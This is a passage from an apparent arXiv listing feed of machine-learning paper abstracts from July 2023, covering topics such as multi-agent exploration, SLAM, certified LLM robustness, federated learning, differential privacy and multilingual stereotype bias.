    Efficient exploration is critical in cooperative deep Multi-Agent Reinforcement Learning (MARL). In this work, we propose an exploration method that effectively encourages cooperative exploration based on the idea of sequential action-computation scheme. The high-level intuition is that to perform optimism-based exploration, agents would explore cooperative strategies if each agent's optimism estimate captures a structured dependency relationship with other agents. Assuming agents compute actions following a sequential order at \textit{each environment timestep}, we provide a perspective to view MARL as tree search iterations by considering agents as nodes at different depths of the search tree. Inspired by the theoretically justified tree search algorithm UCT (Upper Confidence bounds applied to Trees), we develop a method called Conditionally Optimistic Exploration (COE). COE augments each agent's state-action value estimate with an action-conditioned optimistic bonus derived from the visitation count of the global state and joint actions of preceding agents. COE is performed during training and disabled at deployment, making it compatible with any value decomposition method for centralized training with decentralized execution. Experiments across various cooperative MARL benchmarks show that COE outperforms current state-of-the-art exploration methods on hard-exploration tasks.
    Reinforcement Learning with Frontier-Based Exploration via Autonomous Environment. (arXiv:2307.07296v1 [cs.RO])
    Active Simultaneous Localisation and Mapping (SLAM) is a critical problem in autonomous robotics, enabling robots to navigate to new regions while building an accurate model of their surroundings. Visual SLAM is a popular technique that uses virtual elements to enhance the experience. However, existing frontier-based exploration strategies can lead to a non-optimal path in scenarios where there are multiple frontiers with similar distance. This issue can impact the efficiency and accuracy of Visual SLAM, which is crucial for a wide range of robotic applications, such as search and rescue, exploration, and mapping. To address this issue, this research combines both an existing Visual-Graph SLAM known as ExploreORB with reinforcement learning. The proposed algorithm allows the robot to learn and optimize exploration routes through a reward-based system to create an accurate map of the environment with proper frontier selection. Frontier-based exploration is used to detect unexplored areas, while reinforcement learning optimizes the robot's movement by assigning rewards for optimal frontier points. Graph SLAM is then used to integrate the robot's sensory data and build an accurate map of the environment. The proposed algorithm aims to improve the efficiency and accuracy of ExploreORB by optimizing the exploration process of frontiers to build a more accurate map. To evaluate the effectiveness of the proposed approach, experiments will be conducted in various virtual environments using Gazebo, a robot simulation software. Results of these experiments will be compared with existing methods to demonstrate the potential of the proposed approach as an optimal solution for SLAM in autonomous robotics.
    Brain Tumor Detection using Convolutional Neural Networks with Skip Connections. (arXiv:2307.07503v1 [eess.IV])
    In this paper, we present different architectures of Convolutional Neural Networks (CNN) to analyze and classify the brain tumors into benign and malignant types using the Magnetic Resonance Imaging (MRI) technique. Different CNN architecture optimization techniques such as widening and deepening of the network and adding skip connections are applied to improve the accuracy of the network. Results show that a subset of these techniques can judiciously be used to outperform a baseline CNN model used for the same purpose.
    Certified Robustness for Large Language Models with Self-Denoising. (arXiv:2307.07171v1 [cs.CL])
    Although large language models (LLMs) have achieved great success in vast real-world applications, their vulnerabilities towards noisy inputs have significantly limited their uses, especially in high-stake environments. In these contexts, it is crucial to ensure that every prediction made by large language models is stable, i.e., LLM predictions should be consistent given minor differences in the input. This largely falls into the study of certified robust LLMs, i.e., all predictions of LLM are certified to be correct in a local region around the input. Randomized smoothing has demonstrated great potential in certifying the robustness and prediction stability of LLMs. However, randomized smoothing requires adding noise to the input before model prediction, and its certification performance depends largely on the model's performance on corrupted data. As a result, its direct application to LLMs remains challenging and often results in a small certification radius. To address this issue, we take advantage of the multitasking nature of LLMs and propose to denoise the corrupted inputs with LLMs in a self-denoising manner. Different from previous works like denoised smoothing, which requires training a separate model to robustify LLM, our method enjoys far better efficiency and flexibility. Our experiment results show that our method outperforms the existing certification methods under both certified robustness and empirical robustness. The codes are available at https://github.com/UCSB-NLP-Chang/SelfDenoise.
    MaxMin-L2-SVC-NCH: A New Method to Train Support Vector Classifier with the Selection of Model's Parameters. (arXiv:2307.07343v1 [cs.LG])
    The selection of model's parameters plays an important role in the application of support vector classification (SVC). The commonly used method of selecting model's parameters is the k-fold cross validation with grid search (CV). It is extremely time-consuming because it needs to train a large number of SVC models. In this paper, a new method is proposed to train SVC with the selection of model's parameters. Firstly, training SVC with the selection of model's parameters is modeled as a minimax optimization problem (MaxMin-L2-SVC-NCH), in which the minimization problem is an optimization problem of finding the closest points between two normal convex hulls (L2-SVC-NCH) while the maximization problem is an optimization problem of finding the optimal model's parameters. A lower time complexity can be expected in MaxMin-L2-SVC-NCH because CV is abandoned. A gradient-based algorithm is then proposed to solve MaxMin-L2-SVC-NCH, in which L2-SVC-NCH is solved by a projected gradient algorithm (PGA) while the maximization problem is solved by a gradient ascent algorithm with dynamic learning rate. To demonstrate the advantages of the PGA in solving L2-SVC-NCH, we carry out a comparison of the PGA and the famous sequential minimal optimization (SMO) algorithm after a SMO algorithm and some KKT conditions for L2-SVC-NCH are provided. It is revealed that the SMO algorithm is a special case of the PGA. Thus, the PGA can provide more flexibility. The comparative experiments between MaxMin-L2-SVC-NCH and the classical parameter selection models on public datasets show that MaxMin-L2-SVC-NCH greatly reduces the number of models to be trained and the test accuracy is not lost to the classical models. It indicates that MaxMin-L2-SVC-NCH performs better than the other models. We strongly recommend MaxMin-L2-SVC-NCH as a preferred model for SVC task.
    Impact of Free-carrier Nonlinearities on Silicon Microring-based Reservoir Computing. (arXiv:2307.07011v1 [cs.ET])
    We quantify the impact of thermo-optic and free-carrier effects on time-delay reservoir computing using a silicon microring resonator. We identify pump power and frequency detuning ranges with NMSE less than 0.05 for the NARMA-10 task depending on the time constants of the two considered effects.
    Structured Pruning of Neural Networks for Constraints Learning. (arXiv:2307.07457v1 [cs.LG])
    In recent years, the integration of Machine Learning (ML) models with Operation Research (OR) tools has gained popularity across diverse applications, including cancer treatment, algorithmic configuration, and chemical process optimization. In this domain, the combination of ML and OR often relies on representing the ML model output using Mixed Integer Programming (MIP) formulations. Numerous studies in the literature have developed such formulations for many ML predictors, with a particular emphasis on Artificial Neural Networks (ANNs) due to their significant interest in many applications. However, ANNs frequently contain a large number of parameters, resulting in MIP formulations that are impractical to solve, thereby impeding scalability. In fact, the ML community has already introduced several techniques to reduce the parameter count of ANNs without compromising their performance, since the substantial size of modern ANNs presents challenges for ML applications as it significantly impacts computational efforts during training and necessitates significant memory resources for storage. In this paper, we showcase the effectiveness of pruning, one of these techniques, when applied to ANNs prior to their integration into MIPs. By pruning the ANN, we achieve significant improvements in the speed of the solution process. We discuss why pruning is more suitable in this context compared to other ML compression techniques, and we identify the most appropriate pruning strategies. To highlight the potential of this approach, we conduct experiments using feed-forward neural networks with multiple layers to construct adversarial examples. Our results demonstrate that pruning offers remarkable reductions in solution times without hindering the quality of the final decision, enabling the resolution of previously unsolvable instances.
    MaxCorrMGNN: A Multi-Graph Neural Network Framework for Generalized Multimodal Fusion of Medical Data for Outcome Prediction. (arXiv:2307.07093v1 [cs.LG])
    With the emergence of multimodal electronic health records, the evidence for an outcome may be captured across multiple modalities ranging from clinical to imaging and genomic data. Predicting outcomes effectively requires fusion frameworks capable of modeling fine-grained and multi-faceted complex interactions between modality features within and across patients. We develop an innovative fusion approach called MaxCorr MGNN that models non-linear modality correlations within and across patients through Hirschfeld-Gebelein-Renyi maximal correlation (MaxCorr) embeddings, resulting in a multi-layered graph that preserves the identities of the modalities and patients. We then design, for the first time, a generalized multi-layered graph neural network (MGNN) for task-informed reasoning in multi-layered graphs, that learns the parameters defining patient-modality graph connectivity and message passing in an end-to-end fashion. We evaluate our model an outcome prediction task on a Tuberculosis (TB) dataset consistently outperforming several state-of-the-art neural, graph-based and traditional fusion techniques.
    A Scenario-Based Functional Testing Approach to Improving DNN Performance. (arXiv:2307.07083v1 [cs.LG])
    This paper proposes a scenario-based functional testing approach for enhancing the performance of machine learning (ML) applications. The proposed method is an iterative process that starts with testing the ML model on various scenarios to identify areas of weakness. It follows by a further testing on the suspected weak scenarios and statistically evaluate the model's performance on the scenarios to confirm the diagnosis. Once the diagnosis of weak scenarios is confirmed by test results, the treatment of the model is performed by retraining the model using a transfer learning technique with the original model as the base and applying a set of training data specifically targeting the treated scenarios plus a subset of training data selected at random from the original train dataset to prevent the so-call catastrophic forgetting effect. Finally, after the treatment, the model is assessed and evaluated again by testing on the treated scenarios as well as other scenarios to check if the treatment is effective and no side effect caused. The paper reports a case study with a real ML deep neural network (DNN) model, which is the perception system of an autonomous racing car. It is demonstrated that the method is effective in the sense that DNN model's performance can be improved. It provides an efficient method of enhancing ML model's performance with much less human and compute resource than retrain from scratch.
    Neuro-symbolic Empowered Denoising Diffusion Probabilistic Models for Real-time Anomaly Detection in Industry 4.0. (arXiv:2307.06975v1 [cs.LG])
    Industry 4.0 involves the integration of digital technologies, such as IoT, Big Data, and AI, into manufacturing and industrial processes to increase efficiency and productivity. As these technologies become more interconnected and interdependent, Industry 4.0 systems become more complex, which brings the difficulty of identifying and stopping anomalies that may cause disturbances in the manufacturing process. This paper aims to propose a diffusion-based model for real-time anomaly prediction in Industry 4.0 processes. Using a neuro-symbolic approach, we integrate industrial ontologies in the model, thereby adding formal knowledge on smart manufacturing. Finally, we propose a simple yet effective way of distilling diffusion models through Random Fourier Features for deployment on an embedded system for direct integration into the manufacturing process. To the best of our knowledge, this approach has never been explored before.
    Choice Models and Permutation Invariance. (arXiv:2307.07090v1 [econ.EM])
    Choice Modeling is at the core of many economics, operations, and marketing problems. In this paper, we propose a fundamental characterization of choice functions that encompasses a wide variety of extant choice models. We demonstrate how nonparametric estimators like neural nets can easily approximate such functionals and overcome the curse of dimensionality that is inherent in the non-parametric estimation of choice functions. We demonstrate through extensive simulations that our proposed functionals can flexibly capture underlying consumer behavior in a completely data-driven fashion and outperform traditional parametric models. As demand settings often exhibit endogenous features, we extend our framework to incorporate estimation under endogenous features. Further, we also describe a formal inference procedure to construct valid confidence intervals on objects of interest like price elasticity. Finally, to assess the practical applicability of our estimator, we utilize a real-world dataset from S. Berry, Levinsohn, and Pakes (1995). Our empirical analysis confirms that the estimator generates realistic and comparable own- and cross-price elasticities that are consistent with the observations reported in the existing literature.  ( 2 min )
    Leveraging Factored Action Spaces for Off-Policy Evaluation. (arXiv:2307.07014v1 [cs.LG])
    Off-policy evaluation (OPE) aims to estimate the benefit of following a counterfactual sequence of actions, given data collected from executed sequences. However, existing OPE estimators often exhibit high bias and high variance in problems involving large, combinatorial action spaces. We investigate how to mitigate this issue using factored action spaces i.e. expressing each action as a combination of independent sub-actions from smaller action spaces. This approach facilitates a finer-grained analysis of how actions differ in their effects. In this work, we propose a new family of "decomposed" importance sampling (IS) estimators based on factored action spaces. Given certain assumptions on the underlying problem structure, we prove that the decomposed IS estimators have less variance than their original non-decomposed versions, while preserving the property of zero bias. Through simulations, we empirically verify our theoretical results, probing the validity of various assumptions. Provided with a technique that can derive the action space factorisation for a given problem, our work shows that OPE can be improved "for free" by utilising this inherent problem structure.  ( 2 min )
    Safe Reinforcement Learning as Wasserstein Variational Inference: Formal Methods for Interpretability. (arXiv:2307.07084v1 [cs.LG])
    Reinforcement Learning or optimal control can provide effective reasoning for sequential decision-making problems with variable dynamics. Such reasoning in practical implementation, however, poses a persistent challenge in interpreting the reward function and corresponding optimal policy. Consequently, formalizing the sequential decision-making problems as inference has a considerable value, as probabilistic inference in principle offers diverse and powerful mathematical tools to infer the stochastic dynamics whilst suggesting a probabilistic interpretation of the reward design and policy convergence. In this study, we propose a novel Adaptive Wasserstein Variational Optimization (AWaVO) to tackle these challenges in sequential decision-making. Our approach utilizes formal methods to provide interpretations of reward design, transparency of training convergence, and probabilistic interpretation of sequential decisions. To demonstrate practicality, we show convergent training with guaranteed global convergence rates not only in simulation but also in real robot tasks, and empirically verify a reasonable tradeoff between high performance and conservative interpretability.  ( 2 min )
    Accelerated gradient methods for nonconvex optimization: Escape trajectories from strict saddle points and convergence to local minima. (arXiv:2307.07030v1 [math.OC])
    This paper considers the problem of understanding the behavior of a general class of accelerated gradient methods on smooth nonconvex functions. Motivated by some recent works that have proposed effective algorithms, based on Polyak's heavy ball method and the Nesterov accelerated gradient method, to achieve convergence to a local minimum of nonconvex functions, this work proposes a broad class of Nesterov-type accelerated methods and puts forth a rigorous study of these methods encompassing the escape from saddle-points and convergence to local minima through a both asymptotic and a non-asymptotic analysis. In the asymptotic regime, this paper answers an open question of whether Nesterov's accelerated gradient method (NAG) with variable momentum parameter avoids strict saddle points almost surely. This work also develops two metrics of asymptotic rate of convergence and divergence, and evaluates these two metrics for several popular standard accelerated methods such as the NAG, and Nesterov's accelerated gradient with constant momentum (NCM) near strict saddle points. In the local regime, this work provides an analysis that leads to the "linear" exit time estimates from strict saddle neighborhoods for trajectories of these accelerated methods as well the necessary conditions for the existence of such trajectories. Finally, this work studies a sub-class of accelerated methods that can converge in convex neighborhoods of nonconvex functions with a near optimal rate to a local minima and at the same time this sub-class offers superior saddle-escape behavior compared to that of NAG.  ( 3 min )
    Short Boolean Formulas as Explanations in Practice. (arXiv:2307.06971v1 [cs.LO])
    We investigate explainability via short Boolean formulas in the data model based on unary relations. As an explanation of length k, we take a Boolean formula of length k that minimizes the error with respect to the target attribute to be explained. We first provide novel quantitative bounds for the expected error in this scenario. We then also demonstrate how the setting works in practice by studying three concrete data sets. In each case, we calculate explanation formulas of different lengths using an encoding in Answer Set Programming. The most accurate formulas we obtain achieve errors similar to other methods on the same data sets. However, due to overfitting, these formulas are not necessarily ideal explanations, so we use cross validation to identify a suitable length for explanations. By limiting to shorter formulas, we obtain explanations that avoid overfitting but are still reasonably accurate and also, importantly, human interpretable.  ( 2 min )
    Layerwise Linear Mode Connectivity. (arXiv:2307.06966v1 [cs.LG])
    In the federated setup one performs an aggregation of separate local models multiple times during training in order to obtain a stronger global model; most often aggregation is a simple averaging of the parameters. Understanding when and why averaging works in a non-convex setup, such as federated deep learning, is an open challenge that hinders obtaining highly performant global models. On i.i.d.~datasets federated deep learning with frequent averaging is successful. The common understanding, however, is that during the independent training models are drifting away from each other and thus averaging may not work anymore after many local parameter updates. The problem can be seen from the perspective of the loss surface: for points on a non-convex surface the average can become arbitrarily bad. The assumption of local convexity, often used to explain the success of federated averaging, contradicts to the empirical evidence showing that high loss barriers exist between models from the very beginning of the learning, even when training on the same data. Based on the observation that the learning process evolves differently in different layers, we investigate the barrier between models in a layerwise fashion. Our conjecture is that barriers preventing from successful federated training are caused by a particular layer or group of layers.  ( 2 min )
    Implicit regularization in AI meets generalized hardness of approximation in optimization -- Sharp results for diagonal linear networks. (arXiv:2307.07410v1 [cs.LG])
    Understanding the implicit regularization imposed by neural network architectures and gradient based optimization methods is a key challenge in deep learning and AI. In this work we provide sharp results for the implicit regularization imposed by the gradient flow of Diagonal Linear Networks (DLNs) in the over-parameterized regression setting and, potentially surprisingly, link this to the phenomenon of phase transitions in generalized hardness of approximation (GHA). GHA generalizes the phenomenon of hardness of approximation from computer science to, among others, continuous and robust optimization. It is well-known that the $\ell^1$-norm of the gradient flow of DLNs with tiny initialization converges to the objective function of basis pursuit. We improve upon these results by showing that the gradient flow of DLNs with tiny initialization approximates minimizers of the basis pursuit optimization problem (as opposed to just the objective function), and we obtain new and sharp convergence bounds w.r.t.\ the initialization size. Non-sharpness of our results would imply that the GHA phenomenon would not occur for the basis pursuit optimization problem -- which is a contradiction -- thus implying sharpness. Moreover, we characterize $\textit{which}$ $\ell_1$ minimizer of the basis pursuit problem is chosen by the gradient flow whenever the minimizer is not unique. Interestingly, this depends on the depth of the DLN.
    DISPEL: Domain Generalization via Domain-Specific Liberating. (arXiv:2307.07181v1 [cs.CV])
    Domain generalization aims to learn a generalization model that can perform well on unseen test domains by only training on limited source domains. However, existing domain generalization approaches often bring in prediction-irrelevant noise or require the collection of domain labels. To address these challenges, we consider the domain generalization problem from a different perspective by categorizing underlying feature groups into domain-shared and domain-specific features. Nevertheless, the domain-specific features are difficult to be identified and distinguished from the input data. In this work, we propose DomaIn-SPEcific Liberating (DISPEL), a post-processing fine-grained masking approach that can filter out undefined and indistinguishable domain-specific features in the embedding space. Specifically, DISPEL utilizes a mask generator that produces a unique mask for each input data to filter domain-specific features. The DISPEL framework is highly flexible to be applied to any fine-tuned models. We derive a generalization error bound to guarantee the generalization performance by optimizing a designed objective loss. The experimental results on five benchmarks demonstrate DISPEL outperforms existing methods and can further generalize various algorithms.  ( 2 min )
    Robotic Manipulation Datasets for Offline Compositional Reinforcement Learning. (arXiv:2307.07091v1 [cs.LG])
    Offline reinforcement learning (RL) is a promising direction that allows RL agents to pre-train on large datasets, avoiding the recurrence of expensive data collection. To advance the field, it is crucial to generate large-scale datasets. Compositional RL is particularly appealing for generating such large datasets, since 1) it permits creating many tasks from few components, 2) the task structure may enable trained agents to solve new tasks by combining relevant learned components, and 3) the compositional dimensions provide a notion of task relatedness. This paper provides four offline RL datasets for simulated robotic manipulation created using the 256 tasks from CompoSuite [Mendez et al., 2022a]. Each dataset is collected from an agent with a different degree of performance, and consists of 256 million transitions. We provide training and evaluation settings for assessing an agent's ability to learn compositional task policies. Our benchmarking experiments on each setting show that current offline RL methods can learn the training tasks to some extent and that compositional methods significantly outperform non-compositional methods. However, current methods are still unable to extract the tasks' compositional structure to generalize to unseen tasks, showing a need for further research in offline compositional RL.  ( 2 min )
    Exploiting Counter-Examples for Active Learning with Partial labels. (arXiv:2307.07413v1 [cs.LG])
    This paper studies a new problem, \emph{active learning with partial labels} (ALPL). In this setting, an oracle annotates the query samples with partial labels, relaxing the oracle from the demanding accurate labeling process. To address ALPL, we first build an intuitive baseline that can be seamlessly incorporated into existing AL frameworks. Though effective, this baseline is still susceptible to the \emph{overfitting}, and falls short of the representative partial-label-based samples during the query process. Drawing inspiration from human inference in cognitive science, where accurate inferences can be explicitly derived from \emph{counter-examples} (CEs), our objective is to leverage this human-like learning pattern to tackle the \emph{overfitting} while enhancing the process of selecting representative samples in ALPL. Specifically, we construct CEs by reversing the partial labels for each instance, and then we propose a simple but effective WorseNet to directly learn from this complementary pattern. By leveraging the distribution gap between WorseNet and the predictor, this adversarial evaluation manner could enhance both the performance of the predictor itself and the sample selection process, allowing the predictor to capture more accurate patterns in the data. Experimental results on five real-world datasets and four benchmark datasets show that our proposed method achieves comprehensive improvements over ten representative AL frameworks, highlighting the superiority of WorseNet. The source code will be available at \url{https://github.com/Ferenas/APLL}.
    Multiplicative update rules for accelerating deep learning training and increasing robustness. (arXiv:2307.07189v1 [cs.LG])
    Even nowadays, where Deep Learning (DL) has achieved state-of-the-art performance in a wide range of research domains, accelerating training and building robust DL models remains a challenging task. To this end, generations of researchers have pursued to develop robust methods for training DL architectures that can be less sensitive to weight distributions, model architectures and loss landscapes. However, such methods are limited to adaptive learning rate optimizers, initialization schemes, and clipping gradients without investigating the fundamental rule of parameters update. Although multiplicative updates have contributed significantly to the early development of machine learning and hold strong theoretical claims, to best of our knowledge, this is the first work that investigate them in context of DL training acceleration and robustness. In this work, we propose an optimization framework that fits to a wide range of optimization algorithms and enables one to apply alternative update rules. To this end, we propose a novel multiplicative update rule and we extend their capabilities by combining it with a traditional additive update term, under a novel hybrid update method. We claim that the proposed framework accelerates training, while leading to more robust models in contrast to traditionally used additive update rule and we experimentally demonstrate their effectiveness in a wide range of task and optimization methods. Such tasks ranging from convex and non-convex optimization to difficult image classification benchmarks applying a wide range of traditionally used optimization methods and Deep Neural Network (DNN) architectures.
    AnyStar: Domain randomized universal star-convex 3D instance segmentation. (arXiv:2307.07044v1 [cs.CV])
    Star-convex shapes arise across bio-microscopy and radiology in the form of nuclei, nodules, metastases, and other units. Existing instance segmentation networks for such structures train on densely labeled instances for each dataset, which requires substantial and often impractical manual annotation effort. Further, significant reengineering or finetuning is needed when presented with new datasets and imaging modalities due to changes in contrast, shape, orientation, resolution, and density. We present AnyStar, a domain-randomized generative model that simulates synthetic training data of blob-like objects with randomized appearance, environments, and imaging physics to train general-purpose star-convex instance segmentation networks. As a result, networks trained using our generative model do not require annotated images from unseen datasets. A single network trained on our synthesized data accurately 3D segments C. elegans and P. dumerilii nuclei in fluorescence microscopy, mouse cortical nuclei in micro-CT, zebrafish brain nuclei in EM, and placental cotyledons in human fetal MRI, all without any retraining, finetuning, transfer learning, or domain adaptation. Code is available at https://github.com/neel-dey/AnyStar.  ( 2 min )
    DreamTeacher: Pretraining Image Backbones with Deep Generative Models. (arXiv:2307.07487v1 [cs.CV])
    In this work, we introduce a self-supervised feature representation learning framework DreamTeacher that utilizes generative networks for pre-training downstream image backbones. We propose to distill knowledge from a trained generative model into standard image backbones that have been well engineered for specific perception tasks. We investigate two types of knowledge distillation: 1) distilling learned generative features onto target image backbones as an alternative to pretraining these backbones on large labeled datasets such as ImageNet, and 2) distilling labels obtained from generative networks with task heads onto logits of target backbones. We perform extensive analyses on multiple generative models, dense prediction benchmarks, and several pre-training regimes. We empirically find that our DreamTeacher significantly outperforms existing self-supervised representation learning approaches across the board. Unsupervised ImageNet pre-training with DreamTeacher leads to significant improvements over ImageNet classification pre-training on downstream datasets, showcasing generative models, and diffusion generative models specifically, as a promising approach to representation learning on large, diverse datasets without requiring manual annotation.
    A Surrogate Data Assimilation Model for the Estimation of Dynamical System in a Limited Area. (arXiv:2307.07178v1 [math.NA])
    We propose a novel learning-based surrogate data assimilation (DA) model for efficient state estimation in a limited area. Our model employs a feedforward neural network for online computation, eliminating the need for integrating high-dimensional limited-area models. This approach offers significant computational advantages over traditional DA algorithms. Furthermore, our method avoids the requirement of lateral boundary conditions for the limited-area model in both online and offline computations. The design of our surrogate DA model is built upon a robust theoretical framework that leverages two fundamental concepts: observability and effective region. The concept of observability enables us to quantitatively determine the optimal amount of observation data necessary for accurate DA. Meanwhile, the concept of effective region substantially reduces the computational burden associated with computing observability and generating training data.
    Composition-contrastive Learning for Sentence Embeddings. (arXiv:2307.07380v1 [cs.CL])
    Vector representations of natural language are ubiquitous in search applications. Recently, various methods based on contrastive learning have been proposed to learn textual representations from unlabelled data; by maximizing alignment between minimally-perturbed embeddings of the same text, and encouraging a uniform distribution of embeddings across a broader corpus. Differently, we propose maximizing alignment between texts and a composition of their phrasal constituents. We consider several realizations of this objective and elaborate the impact on representations in each case. Experimental results on semantic textual similarity tasks show improvements over baselines that are comparable with state-of-the-art approaches. Moreover, this work is the first to do so without incurring costs in auxiliary training objectives or additional network parameters.
    Bootstrapping Vision-Language Learning with Decoupled Language Pre-training. (arXiv:2307.07063v1 [cs.CV])
    We present a novel methodology aimed at optimizing the application of frozen large language models (LLMs) for resource-intensive vision-language (VL) pre-training. The current paradigm uses visual features as prompts to guide language models, with a focus on determining the most relevant visual features for corresponding text. Our approach diverges by concentrating on the language component, specifically identifying the optimal prompts to align with visual features. We introduce the Prompt-Transformer (P-Former), a model that predicts these ideal prompts, which is trained exclusively on linguistic data, bypassing the need for image-text pairings. This strategy subtly bifurcates the end-to-end VL training process into an additional, separate stage. Our experiments reveal that our framework significantly enhances the performance of a robust image-to-text baseline (BLIP-2), and effectively narrows the performance gap between models trained with either 4M or 129M image-text pairs. Importantly, our framework is modality-agnostic and flexible in terms of architectural design, as validated by its successful application in a video learning task using varied base modules. The code is available at https://github.com/yiren-jian/BLIText  ( 2 min )
  • Open

    How Different Is Stereotypical Bias Across Languages?. (arXiv:2307.07331v1 [cs.CL])
    Recent studies have demonstrated how to assess the stereotypical bias in pre-trained English language models. In this work, we extend this branch of research in multiple different dimensions by systematically investigating (a) mono- and multilingual models of (b) different underlying architectures with respect to their bias in (c) multiple different languages. To that end, we make use of the English StereoSet data set (Nadeem et al., 2021), which we semi-automatically translate into German, French, Spanish, and Turkish. We find that it is of major importance to conduct this type of analysis in a multilingual setting, as our experiments show a much more nuanced picture as well as notable differences from the English-only analysis. The main takeaways from our analysis are that mGPT-2 (partly) shows surprising anti-stereotypical behavior across languages, English (monolingual) models exhibit the strongest bias, and the stereotypes reflected in the data set are least present in Turkish models. Finally, we release our codebase alongside the translated data sets and practical guidelines for the semi-automatic translation to encourage a further extension of our work to other languages.
    Signed iterative random forests to identify enhancer-associated transcription factor binding. (arXiv:1810.07287v2 [stat.ML] UPDATED)
    Standard ChIP-seq peak calling pipelines seek to differentiate biochemically reproducible signals of individual genomic elements from background noise. However, reproducibility alone does not imply functional regulation (e.g., enhancer activation, alternative splicing). Here we present a general-purpose, interpretable machine learning method: signed iterative random forests (siRF), which we use to infer regulatory interactions among transcription factors and functional binding signatures surrounding enhancer elements in Drosophila melanogaster.
    Adaptive Linear Estimating Equations. (arXiv:2307.07320v1 [math.ST])
    Sequential data collection has emerged as a widely adopted technique for enhancing the efficiency of data gathering processes. Despite its advantages, such data collection mechanism often introduces complexities to the statistical inference procedure. For instance, the ordinary least squares (OLS) estimator in an adaptive linear regression model can exhibit non-normal asymptotic behavior, posing challenges for accurate inference and interpretation. In this paper, we propose a general method for constructing debiased estimator which remedies this issue. It makes use of the idea of adaptive linear estimating equations, and we establish theoretical guarantees of asymptotic normality, supplemented by discussions on achieving near-optimal asymptotic variance. A salient feature of our estimator is that in the context of multi-armed bandits, our estimator retains the non-asymptotic performance of the least square estimator while obtaining asymptotic normality property. Consequently, this work helps connect two fruitful paradigms of adaptive inference: a) non-asymptotic inference using concentration inequalities and b) asymptotic inference via asymptotic normality.
    DoCoFL: Downlink Compression for Cross-Device Federated Learning. (arXiv:2302.00543v2 [cs.LG] UPDATED)
    Many compression techniques have been proposed to reduce the communication overhead of Federated Learning training procedures. However, these are typically designed for compressing model updates, which are expected to decay throughout training. As a result, such methods are inapplicable to downlink (i.e., from the parameter server to clients) compression in the cross-device setting, where heterogeneous clients $\textit{may appear only once}$ during training and thus must download the model parameters. Accordingly, we propose $\textsf{DoCoFL}$ -- a new framework for downlink compression in the cross-device setting. Importantly, $\textsf{DoCoFL}$ can be seamlessly combined with many uplink compression schemes, rendering it suitable for bi-directional compression. Through extensive evaluation, we show that $\textsf{DoCoFL}$ offers significant bi-directional bandwidth reduction while achieving competitive accuracy to that of a baseline without any compression.  ( 2 min )
    $\Phi$-DVAE: Physics-Informed Dynamical Variational Autoencoders for Unstructured Data Assimilation. (arXiv:2209.15609v2 [stat.ML] UPDATED)
    Incorporating unstructured data into physical models is a challenging problem that is emerging in data assimilation. Traditional approaches focus on well-defined observation operators whose functional forms are typically assumed to be known. This prevents these methods from achieving a consistent model-data synthesis in configurations where the mapping from data-space to model-space is unknown. To address these shortcomings, in this paper we develop a physics-informed dynamical variational autoencoder ($\Phi$-DVAE) to embed diverse data streams into time-evolving physical systems described by differential equations. Our approach combines a standard, possibly nonlinear, filter for the latent state-space model and a VAE, to assimilate the unstructured data into the latent dynamical system. Unstructured data, in our example systems, comes in the form of video data and velocity field measurements, however the methodology is suitably generic to allow for arbitrary unknown observation operators. A variational Bayesian framework is used for the joint estimation of the encoding, latent states, and unknown system parameters. To demonstrate the method, we provide case studies with the Lorenz-63 ordinary differential equation, and the advection and Korteweg-de Vries partial differential equations. Our results, with synthetic data, show that $\Phi$-DVAE provides a data efficient dynamics encoding methodology which is competitive with standard approaches. Unknown parameters are recovered with uncertainty quantification, and unseen data are accurately predicted.  ( 3 min )
    Linear Classification of Neural Manifolds with Correlated Variability. (arXiv:2211.14961v2 [q-bio.NC] UPDATED)
    Understanding how the statistical and geometric properties of neural activity relate to performance is a key problem in theoretical neuroscience and deep learning. Here, we calculate how correlations between object representations affect the capacity, a measure of linear separability. We show that for spherical object manifolds, introducing correlations between centroids effectively pushes the spheres closer together, while introducing correlations between the axes effectively shrinks their radii, revealing a duality between correlations and geometry with respect to the problem of classification. We then apply our results to accurately estimate the capacity of deep network data.  ( 2 min )
    Stream-based active learning with linear models. (arXiv:2207.09874v5 [stat.ML] UPDATED)
    The proliferation of automated data collection schemes and the advances in sensorics are increasing the amount of data we are able to monitor in real-time. However, given the high annotation costs and the time required by quality inspections, data is often available in an unlabeled form. This is fostering the use of active learning for the development of soft sensors and predictive models. In production, instead of performing random inspections to obtain product information, labels are collected by evaluating the information content of the unlabeled data. Several query strategy frameworks for regression have been proposed in the literature but most of the focus has been dedicated to the static pool-based scenario. In this work, we propose a new strategy for the stream-based scenario, where instances are sequentially offered to the learner, which must instantaneously decide whether to perform the quality check to obtain the label or discard the instance. The approach is inspired by the optimal experimental design theory and the iterative aspect of the decision-making process is tackled by setting a threshold on the informativeness of the unlabeled data points. The proposed approach is evaluated using numerical simulations and the Tennessee Eastman Process simulator. The results confirm that selecting the examples suggested by the proposed algorithm allows for a faster reduction in the prediction error.  ( 3 min )
    Differentially Private Stochastic Gradient Descent with Low-Noise. (arXiv:2209.04188v2 [stat.ML] UPDATED)
    Modern machine learning algorithms aim to extract fine-grained information from data to provide accurate predictions, which often conflicts with the goal of privacy protection. This paper addresses the practical and theoretical importance of developing privacy-preserving machine learning algorithms that ensure good performance while preserving privacy. In this paper, we focus on the privacy and utility (measured by excess risk bounds) performances of differentially private stochastic gradient descent (SGD) algorithms in the setting of stochastic convex optimization. Specifically, we examine the pointwise problem in the low-noise setting for which we derive sharper excess risk bounds for the differentially private SGD algorithm. In the pairwise learning setting, we propose a simple differentially private SGD algorithm based on gradient perturbation. Furthermore, we develop novel utility bounds for the proposed algorithm, proving that it achieves optimal excess risk rates even for non-smooth losses. Notably, we establish fast learning rates for privacy-preserving pairwise learning under the low-noise condition, which is the first of its kind.  ( 2 min )
    On Statistical Discrimination as a Failure of Social Learning: A Multi-Armed Bandit Approach. (arXiv:2010.01079v6 [econ.TH] UPDATED)
    We analyze statistical discrimination in hiring markets using a multi-armed bandit model. Myopic firms face workers arriving with heterogeneous observable characteristics. The association between the worker's skill and characteristics is unknown ex ante; thus, firms need to learn it. Laissez-faire causes perpetual underestimation: minority workers are rarely hired, and therefore, the underestimation tends to persist. Even a marginal imbalance in the population ratio frequently results in perpetual underestimation. We propose two policy solutions: a novel subsidy rule (the hybrid mechanism) and the Rooney Rule. Our results indicate that temporary affirmative actions effectively alleviate discrimination stemming from insufficient data.  ( 2 min )
    Hypothesis Transfer Learning with Surrogate Classification Losses: Generalization Bounds through Algorithmic Stability. (arXiv:2305.19694v2 [stat.ML] UPDATED)
